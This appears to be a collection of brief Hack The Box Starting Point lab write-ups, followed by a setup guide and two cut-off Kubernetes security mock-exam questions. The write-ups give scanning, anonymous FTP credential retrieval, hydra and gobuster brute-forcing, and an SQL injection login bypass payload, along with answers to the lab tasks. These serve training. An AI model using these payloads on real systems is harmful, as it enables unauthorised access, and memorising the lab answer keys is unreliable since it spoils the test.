Hack The Box :: Starting Point - Crocodile
Port scan:
nmap 10.129.171.69
nmap 10.129.171.69 -A -p 21,80
Anonymous login is allowed, and two files are present:
ftp 10.129.171.69
Anonymous #log in
ls #list the directory
get allowed.userlist
get allowed.userlist.passwd
exit
cat allowed.userlist
cat allowed.userlist.passwd
Browse port 80. Brute-force paths:
gobuster dir -u 10.129.171.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x .php
Log in with the information from the files above to get the flag.
Task 1 What Nmap scanning switch employs the use of default scripts during a scan? -sC
Task 2 What service version...
Hack The Box :: Starting Point - Sequel
Scan; port 3306 is found open:
nmap -A 10.129.95.232
Weak password: the password is empty. To crack other passwords, replace -e nsr with a wordlist path:
hydra -l root -e nsr mysql://10.129.95.232
Log in to MySQL:
mysql -uroot -h 10.129.95.232
show databases; #list the databases
use htb; #switch database
show tables; #list the tables
select * from config; #fetch the data in the table
Task 1 During our scan, which port do we find serving MySQL? 3306
Task 2 What community-developed MySQL version is the target running? MariaDB
Task 3 When using the MySQL command line client,...
Hack The Box :: Starting Point - Appointment
Port scan:
nmap -sV 10.129.24.207
The page is a login page; according to the hint it is vulnerable to SQL injection. Try testing with ' or 1=1;#
admin1' or 1=1;#
Task 1 What does the acronym SQL stand for? Structured Query Language
Task 2 What is one of the most common type of SQL vulnerabilities? sql injection
Task 3 What does PII stand for? personally identifiable information
Task 4 What is the 2021 OWASP Top 10 classification for this vulnerability? A03:2021-Injection
Task 5 What does Nmap report as the service and version that are running on...
Hack The Box :: Starting Point - Redeemer
Which TCP port is open on the machine? 6379
Scan:
nmap -p- --min-rate 5000 -sV 10.129.241.156 --open
Which service is running on the port that is open on the machine? redis
What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database In-memory Database
Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments. redis-cli
Which flag is used...
Hack The Box :: Starting Point - Dancing
Scan:
nmap --open 10.129.1.125
Inspect the SMB service:
smbclient -L 10.129.1.125
#smbclient \\\\IP\\share-name
smbclient \\\\10.129.1.125\\WorkShares
ls #dir also works
TASK 1 What does the 3-letter acronym SMB stand for? server message block
TASK 2 What port does SMB use to operate at? 445
TASK 3 What is the service name for port 445 that came up in our Nmap scan? microsoft-ds
TASK 4 What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share? -L
TASK 5 How many shares...
Hack The Box :: Starting Point - Fawn
Scan:
nmap --open 10.129.26.35
nmap -A -p 21 10.129.26.35
Get the flag:
ftp 10.129.26.35
anonymous
ls
get flag.txt
cat flag.txt
TASK 1 What does the 3-letter acronym FTP stand for? File Transfer Protocol
TASK 2 Which port does the FTP service listen on usually? 21
TASK 3 What acronym is used for the secure version of FTP? SFTP
TASK 4 What is the command we can use to send an ICMP echo request to test our connection to the target? ping
TASK 5 From your scans, what version is FTP...
Hack The Box :: Starting Point - Meow
Some terminology; fairly simple.
TASK 1 What does the acronym VM stand for? Virtual Machine
TASK 2 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell. terminal
TASK 3 What service do we use to form our VPN connection into HTB labs? openvpn
Task 4 What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output? tun
Task 5 What tool do...
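Hack The Box: First-Time Use
After logging in, click Lab --> STARTING POINT on the right, then click the first item.
Connect using an OpenVPN configuration file: download the configuration file, then download an OpenVPN client to use it with: https://openvpn.net/
Linux reference: https://community.openvpn.net/openvpn/wiki/OpenVPN3Linux
Usage: openvpn xxx.ovpn
Windows: https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
Usage: after installing, import the downloaded configuration file, then click connect.
Start the target virtual machine: click Start point in the upper left to view the current connection status. Once connected, you can start the target. Click spawn machine to power it on. Wait a moment until an IP address appears, and then you can begin testing. The buttons after it are restart and shut down, respectively.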
CKS Mock Exam Killer.sh | Preview Question 3
Use context: kubectl config use-context workload-stage
A security scan result shows that there is an unknown miner process running on one of the Nodes in cluster3. The report states that the process is listening on port 6666. Kill the process and delete the binary.
Solution
Check the nodes:
k get node
Check the master node:
ssh cluster3-controlplane1
netstat -plnt | grep 6666
Check the worker node:
ssh...
CKS Mock Exam Killer.sh | Preview Question 2
Use context: kubectl config use-context infra-prod
There is an existing Open Policy Agent + Gatekeeper policy to enforce that all Namespaces need to have label security-level set. Extend the policy constraint and template so that all Namespaces also need to set label management-team. Any new Namespace creation without these two labels should be prevented. Write the names of all existing Namespaces which violate the updated policy into /opt/course/p2/fix-namespaces.
Translation: Use context: kubectl...









